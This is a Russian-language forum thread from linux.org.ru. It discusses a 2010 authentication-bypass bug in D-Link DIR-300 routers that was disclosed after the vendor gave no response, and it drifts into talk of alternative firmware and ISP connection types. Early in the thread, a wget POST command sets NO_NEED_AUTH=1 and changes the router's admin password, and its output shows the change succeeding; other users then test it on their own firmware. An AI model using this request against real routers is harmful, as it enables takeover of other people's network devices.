LINUX.ORG.RU
ФорумTalks

[Dlink][Решето][боян?] Бага в DIR-300

 ,


0

1

Hello, I found security bug in D-Link DIR-300 wireless router. It can be used to bypass authentication mechanizm by attacker with access to web interface.

Пруф: http://securityvulns.ru/Zdocument119.html

Самое веселое:

I reported it to D-Link but they are not replying for my emails. According to other D-Link security holes and their status I think that they won't reply, so I decided to write about it here.

--------

- Information sent to vendor 07.08.2010

- No response

- Information resended to vendor 07.31.2010

- No response from vendor

Dlink такой Dlink

★★★★★

rain@acnote:/tmp$ wget http://someip:8080/tools_admin.php --post-data="ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=temp123"
--2010-11-16 12:51:13--  http://someip:8080/tools_admin.php
Устанавливается соединение с someip:8080... соединение установлено.
Запрос HTTP послан, ожидается ответ... 200 OK
Длина: нет информации [text/html]
Saving to: «tools_admin.php»

    [ <=>                                                                  ] 14 516      --.-K/s   в 0,01s    

2010-11-16 12:51:13 (1,36 MB/s) - «tools_admin.php» saved [14516]

rain@acnote:/tmp$ grep saved tools_admin.php 
                        <center>The settings are being saved and are taking effect. <br><br> Please wait ...<br><br><br><br>

На 400-ке проверил, вроде не работает (если что - там чуть другие поля)

Сейчас ищу 320-ку, чтобы проверить на ней :)

YAR ★★★★★
() автор топика
Ответ на: комментарий от local_root

С таким же запросом? А то тут человек все никак не разродится вывести интерфейс наружу.

YAR ★★★★★
() автор топика

баг в длинке? Это не новость. Новость была бы, если бы они выпустили девайс без багов

nu11 ★★★★★
()
Ответ на: комментарий от YAR

Уже проверил, так же само.

Версия программного обеспечения : 1.10

YAR ★★★★★
() автор топика
Ответ на: комментарий от YAR

DIR-300

grep saved tools_admin.php

Не нашел ничего такого типа «The settings are being saved and are taking effect.»

Хотя, после wget http://someip:8080/tools_admin.php --post-data=«ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=temp123» стал внезапно запрашивать капчу, хотя она отключена в настройках.

Flying_Funk
()
Ответ на: комментарий от Flying_Funk

Прошивка штатная?

А капчу он начинает запрашивать, если сильно часто ломиться с неправильным паролем.

Переименуй tools_admin.php в *.html и глянь в браузере, что там роутер ответил

YAR ★★★★★
() автор топика

2600BRU у меня не смог прочитать свои же сохранённые настройки. Так что чему тут удивляться?

queen3 ★★★★★
()

Пофиг, в день покупки перешил в dd-wrt

sdio ★★★★★
()
Ответ на: комментарий от YAR

Прошивка самая что ни на есть стандартная: «Версия программного обеспечения : 1.05 , Mon 01 Mar 2010»

В браузере написано «Настройки не были изменены.».

Flying_Funk
()

Стоковые прошивки от длинка - механизм, позволяющий влить в железку альтернативные прошивки :)

Deleted
()
Ответ на: комментарий от Deleted

> Стоковые прошивки от длинка - механизм, позволяющий влить в железку альтернативные прошивки :)

Ну да. Ни на что больше они не годны.
Опасения вызывают напрочь проприетарные прошивки DSL-модемов, DD-WRT в которые не льется (судя по всему из-за того, что в DD-WRT по лицензионным соображениям нельзя сунуть блоб драйвера).
Скорее всего эти самые DSL-модемы болеют все тем же.

pekmop1024 ★★★★★
()
Ответ на: комментарий от xorik

> У меня openwrt и нет веб-интерфейса, так что пох :)

+1

Deleted
()
Ответ на: комментарий от pekmop1024

>Кто-то юзает говнопровайдеров, кидающих инет по pptp/l2tp? ССЗБ.
Не хочу тебя расстраивать, но во многих городах этой страны провайдеров, дающих нормальный доступ без VPN, просто нет.

Ramen ★★★★
()
Ответ на: комментарий от Ramen

Вы живете в городе, где «провайдеров, дающих нормальный доступ без VPN, просто нет» ?

CCЗБ!

devl547 ★★★★★
()
Ответ на: комментарий от Ramen

Как у вас все грустно-то...
У нас в основном или нормальный внешний адрес без извращений, или пппое накрайняк.

pekmop1024 ★★★★★
()

от официальных прошивок добра не жди. тем более есть множество (точнее 3, известных мне) превосходных альтернатив.

unikum ★★★★★
()
Ответ на: комментарий от pekmop1024

>Как у вас все грустно-то...
Не, у нас уже не всё грустно.
Мой пров потихоньку отказывается от VPN-а, но сделать доступ без оного для владельцев реальных IP они пока не осилили.
Ещё один пров раньше использовал PPPoE, работало оно через жопу у них и они от него тоже отказались. Правда качество услуг у этого прова в принципе хреновое. :-)
Ну и есть ещё один пров, который отказываться от VPN-а пока не собирается.

пппое накрайняк

Чем пппое лучше VPN-а? Тем, что в венде без плясок с бубном не работает?

Ramen ★★★★
()
Ответ на: комментарий от Ramen

> Чем пппое лучше VPN-а?

PPPoE менее ресурсоемок, как для клиента, так и для сервера.
+ меньше геморроя с роутерами, т.к. ядерный PPPoE есть всюду, в отличие от PPTP.

Но попробуй этоь еще объясни админам локалхоста^W ваших провайдеров.

pekmop1024 ★★★★★
()

Кстати прокакую версию dir-300 идет речь? А то в дефолтной прошивке для a1 вообще абаржака, пароль на веб интерфейс в открытом виде лежит.

emaxx ★★
()
Ответ на: комментарий от pekmop1024

>PPPoE менее ресурсоемок, как для клиента, так и для сервера.
Чем L2TP тот же? Что-то незаметно.

+ меньше геморроя с роутерами

Зато больше проблем с вендой. А роутеры провайдеров мало интересуют.

Ramen ★★★★
()
Ответ на: комментарий от pekmop1024

Какие у вас продвинутые хомячки. Наши хомячки до сих пор далеко не все даже знают, что такое роутер.

Ramen ★★★★
()
Ответ на: комментарий от Ramen

> Какие у вас продвинутые хомячки. Наши хомячки до сих пор далеко не все даже знают, что такое роутер.

С нашим укртелекомом, сдирающим за настройку модема/роутера вдвое больше его цены, еще и не такому научиться могут :)

pekmop1024 ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.